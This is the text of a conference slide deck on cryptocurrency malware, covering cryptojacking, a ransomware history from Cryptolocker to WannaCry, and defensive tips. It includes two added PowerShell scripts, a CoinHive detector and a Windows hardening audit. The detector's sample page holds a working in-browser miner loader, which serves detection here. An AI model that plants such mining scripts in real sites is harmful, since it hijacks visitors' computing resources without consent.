#RSAC

SESSION ID: SEM-W02G

CRYPTOCURRENCY MALWARE

Laurence Pitt, Director, Security Strategy, Juniper Networks, @LAURENCEPITT

Our discussion today

1. What is cryptocurrency
2. Ransomware history
3. Cryptojacking
4. Tips to avoid cryptocurrency malware
5. Conclusions

What is Cryptocurrency Malware

Any malware that uses or mines crypto coins. For example: crypto ransomware and miner trojans.

Bitcoin Primer

• easy to use,
• fast,
• publicly available,
• decentralized,
• anonymity serves to encourage extortion.

Bitcoin up 10x in a year — and highly adopted

[Charts: value shift during 2017; number of Bitcoin wallets. Source: Blockchain.info]

Mining Bitcoin

China, Japan, Iceland, Georgia, Sweden

Ethereum vs Bitcoin

Oil vs Gold

Anonymity

o Mixer
o Private coin

Cryptojacking

CoinHive

[Diagram: 1 Threat actor; 2 Compromised website with cryptomining script embedded; 3 End-users; 4 Cryptocurrency mining]

STEPS
1. The threat actor compromises a website
2. Users connect to the compromised website and the cryptomining script executes
3. Users unknowingly start mining cryptocurrency on behalf of the threat actor
4. Upon successfully adding a new block to the blockchain, the threat actor receives a reward in cryptocurrency coins

Cryptojacking Defense
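As an added defensive example (not code from the deck or from Juniper), a PowerShell function that flags the loader pattern from steps 2 and 3 in a saved page's HTML: the external CoinHive script tag and the inline call that starts the miner in the visitor's browser. The CoinHive loader URL and constructor names are the ones the service published at the time; the signature lists, `miner.example` and the sample page are constructed assumptions to extend from your own intel.

```powershell
# Added example, not from the deck or Juniper: flag the cryptojacking loader pattern from
# steps 2-3 in saved page HTML. Signature lists are illustrative assumptions.
$minerHosts    = @('coinhive.com', 'miner.example')   # coinhive.com per the deck; miner.example is a placeholder
$minerPatterns = @('new\s+CoinHive\.(Anonymous|User)\s*\(', 'coinhive\.min\.js')  # CoinHive's published JS API / loader

function Find-CryptominingScript {
    param([Parameter(Mandatory)][string]$Html, [string]$Page = '<inline>')
    $hits = @()
    # Step 2: an external loader, e.g. <script src="https://coinhive.com/lib/coinhive.min.js">
    foreach ($m in [regex]::Matches($Html, '<script[^>]*\ssrc\s*=\s*["'']([^"'']+)["'']', 'IgnoreCase')) {
        $src = $m.Groups[1].Value
        if ($src.StartsWith('//')) { $src = 'https:' + $src }    # protocol-relative URL
        try { $srcHost = ([uri]$src).Host } catch { $srcHost = '' }   # relative src: no host, skip
        foreach ($h in $minerHosts) {
            if ($srcHost -eq $h -or $srcHost.EndsWith(".$h")) {
                $hits += [pscustomobject]@{ Page = $Page; Kind = 'external'; Reason = "script host $h"; Evidence = $src }
            }
        }
    }
    # Step 3: inline code that instantiates and starts the miner in the visitor's browser
    foreach ($m in [regex]::Matches($Html, '<script[^>]*>(.*?)</script>', 'IgnoreCase, Singleline')) {
        $body = ($m.Groups[1].Value -replace '\s+', ' ').Trim()
        foreach ($p in $minerPatterns) {
            if ($body -match $p) {
                if ($body.Length -gt 80) { $body = $body.Substring(0, 80) + '...' }
                $hits += [pscustomobject]@{ Page = $Page; Kind = 'inline'; Reason = "matches /$p/"; Evidence = $body }
                break
            }
        }
    }
    return $hits
}

# Constructed sample page showing both indicators; SITE_KEY_PLACEHOLDER stands in for the threat actor's site key.
$sample = @'
<html><head><script src="//coinhive.com/lib/coinhive.min.js"></script></head>
<body><script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.3 });
  miner.start();
</script></body></html>
'@
Find-CryptominingScript -Html $sample -Page 'sample.html' | Format-Table Kind, Reason, Evidence -AutoSize
```

Run it over crawled or proxy-cached HTML of your own sites to catch step 1 (a compromised page) before visitors reach step 3.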

o CryptoJackingTest.com
o NoCoin
o MinerBlock
o AdBlock
o NoScript

Prediction #4

More IOT (Internet Of Things) security incidents

CRYPTO RANSOMWARE

RANSOMWARE ATTACK EVERY 40 SECONDS (Source: Kaspersky Security Bulletin)

5.99bn RANSOMWARE ATTACKS 1H/18 (Source: Sonicwall annual Cyber Threat Report 2018)

Asymmetric encryption

The ransomware business model

• 90% of people do not backup daily
• Data theft in place
• Extortion
• Focus on ease of use to conversion
• Currently 50% pay the ransom, up from 41% 2 years ago

The ransomware business model

[Diagram: Locked Files; Bitcoin Ransom Sent to C&C Server; Private Key Sent; Unlocked Files]

38% of businesses hit in 2017

Costs of ransomware

2015: $24,000,000
2016: $1,000,000,000
2017: $5,000,000,000

Additional Costs

• Network mitigation
• Network countermeasures
• Loss of productivity
• Legal fees
• IT services
• Purchase of credit monitoring services for employees or customers
• Potential harm to an organization’s reputation

Ransomware Timeline

Endgame

What is Cryptolocker?

• Began September 2013
• Encrypts victim’s files, asks for $300 ransom
• Impossible to recover files without a key
• Ransom increases after deadline
• Goal is monetary via Bitcoin
• 250,000+ victims worldwide

Cryptodefense aka Cryptowall

• Cryptodefense was the next version of Cryptolocker; appeared in Feb 2014
• No GUI; pops up a webpage, drops a text file
• Uses … for anonymous payments, and as it makes it harder to track

Locky

• 2016
• Installed by the Dridex gang
• Word documents with macros over email
• Used JavaScript, PowerShell
• Over 400,000 victims in hours

Keranger: First Ransomware on OSX

• Appeared in March 2016
• 1BTC – $400 at the time
• Signed software!
• Uses an infected Transmission BitTorrent installer

IOT – Smart TV Ransomware, aka Frantic Locker

• Flocker Ransomware infects Smart TVs
• Locks the screen and demands $200 in iTunes cards

IOT Thermostat Ransomware: DEFCON Proof of Concept

• Locks the temperature at 99 degrees until the owner pays the ransom to obtain a PIN which would unlock it

CryptoShuffler

• Stolen 23 bitcoins so far
• Attacks Dogecoin, Litecoin, Dash, Ethereum, Monero, and Zcash
• Watches the user's clipboard and replaces any string that looks like a Bitcoin wallet with the attackers' address

Ransomware has PEAKED

Or has it…

WANNACRY: The new peak for ransomware

Group linked to North Korea launched a global ransom worm. Same group hacked Sony.

For the first time, a ransomware payload was merged with an NSA-developed SMB exploit. It infected 2.3 million computers quickly.

Accidental Kill Switch

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

If the connection succeeds, the binary exits.

Most likely an anti-sandbox technique.

Damages estimated at $4 billion

PETYA (June 2017)

Russia attacked Ukraine via a malware wiper disguised as ransomware.

Unusual attack, as the goal of Petya was disruption of infrastructure.

Seeded via MeDoc, accounting software that is mandated for tax reporting by the Ukrainian government.

BADRABBIT

• BadRabbit hit on Oct 24, 2017
• Seeded via compromised websites that offered a bogus update to Adobe Flash software.
• Believed to be from the same actor (Telebots) who wrote Petya.
• 200+ victims in Eastern Europe

FACEX Worm

o Discovered in May 2018
o Malicious Chrome extension
o Spreads via Facebook Messenger links
o Hijacks bitcoin transactions
o Hijacks Coinhive and other cryptocurrency websites

Tips to avoid Ransomware

• Install the latest patches for your software, especially Adobe, Microsoft and Oracle
• Use network traffic monitoring
• Use a comprehensive endpoint security solution with behavioral detection
• Turn Windows User Account Control (UAC) on
• Block Macros
• Disable the Windows Management Instrumentation (WMI) service

Tips to avoid Ransomware

• Be skeptical: don’t click on anything suspicious
• Block popups and use an ad-blocker
• Override your browser’s user-agent*
• Consider Microsoft Office viewers
• Disable Windows Script Host
• Disable SMBv1

Windows tips to avoid Ransomware
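An audit script for the Windows tips on this and the neighbouring slides (UAC, macros, Windows Script Host, SMBv1, Autoplay, Controlled Folders, WMI), added here as an example and not code from the deck or from Juniper. It assumes Windows 10 with Office 2016 or later and an elevated PowerShell; it reports by default and changes settings only when run with -Apply.

```powershell
# Added example (not code from the deck or from Juniper): audit the Windows tips on these
# slides and apply them with -Apply. Assumes Windows 10, Office 2016+, elevated PowerShell.
[CmdletBinding()]
param([switch]$Apply)

# Registry-backed tips: UAC on, Windows Script Host off, Autoplay off for every drive type,
# Word macros disabled without notification (VBAWarnings=4; 16.0 = Office 2016/2019/365).
$regChecks = @(
    @{ Name = 'UAC enabled';         Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System';   Key = 'EnableLUA';          Want = 1 }
    @{ Name = 'Script Host off';     Path = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings';              Key = 'Enabled';            Want = 0 }
    @{ Name = 'Autoplay off';        Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Key = 'NoDriveTypeAutoRun'; Want = 255 }
    @{ Name = 'Word macros blocked'; Path = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security';        Key = 'VBAWarnings';        Want = 4 }
)

function Report($Name, $Current, $Want) {
    $state = if ($Current -eq $Want) { 'OK ' } else { 'FIX' }
    if ($null -eq $Current) { $Current = 'unset' }
    Write-Output ("{0} {1,-20} current={2,-6} want={3}" -f $state, $Name, $Current, $Want)
}

foreach ($c in $regChecks) {
    $current = (Get-ItemProperty -Path $c.Path -Name $c.Key -ErrorAction SilentlyContinue).($c.Key)
    Report $c.Name $current $c.Want
    if ($Apply -and $current -ne $c.Want) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Key -Value $c.Want -Type DWord
    }
}

# SMBv1, the protocol WannaCry's SMB exploit targeted: server switch plus the optional feature.
$smb1 = (Get-SmbServerConfiguration).EnableSMB1Protocol
Report 'SMBv1 disabled' $smb1 $false
if ($Apply -and $smb1) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
}

# Controlled Folder Access (Windows 10 1709+): 1 = Enabled, 0 = Disabled, 2 = Audit mode.
$cfa = (Get-MpPreference).EnableControlledFolderAccess
Report 'Controlled folders' $cfa 1
if ($Apply -and $cfa -ne 1) { Set-MpPreference -EnableControlledFolderAccess Enabled }

# WMI (winmgmt) is reported only: Defender, SCCM and most monitoring agents depend on it,
# so decide per host before disabling it as the deck suggests.
$wmiStart = (Get-Service -Name winmgmt).StartType
Report 'WMI service' $wmiStart 'Disabled'
```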

• Disable Autoplay
• Enable UAC

Windows 10 – Controlled Folders

• Prevents unauthorized apps from modifying files in protected folders
• In Windows 10 version 1709, aka "Redstone 3"
• On a Mac: RansomWhere

Tips to Avoid Losing Data to Ransomware

• Identify the ransomware and look for a decryptor: https://id-ransomware.malwarehunterteam.com/
• Shadow Copies
• Turn off the computer at the first signs of infection
• Remember: the only effective ransomware defense is backup

List of decryptors

http://bit.ly/decryptors

Conclusions

1. Ransomware has evolved into a major threat allowing criminals to easily monetize malware via Bitcoin, Monero, Zcash
2. Every platform is vulnerable to ransomware
3. Backup your files! Since decrypting files is not always possible, frequent backups become even more critical. And keep your backups offline

How can I apply this to my business?

What should you do next?

• Ensure that you educate the workforce on the dangers of cryptocurrency malware attacks. The best prevention is awareness.

In the short term you need to:
• Make sure that systems run up-to-date antimalware solutions
• Backups are CRITICAL should ransomware hit. Review your existing plan.

Ongoing and for the future:
• Watch the news; tense geopolitical situations can signal attacks
• Assume that the bad guys are watching and monitoring.
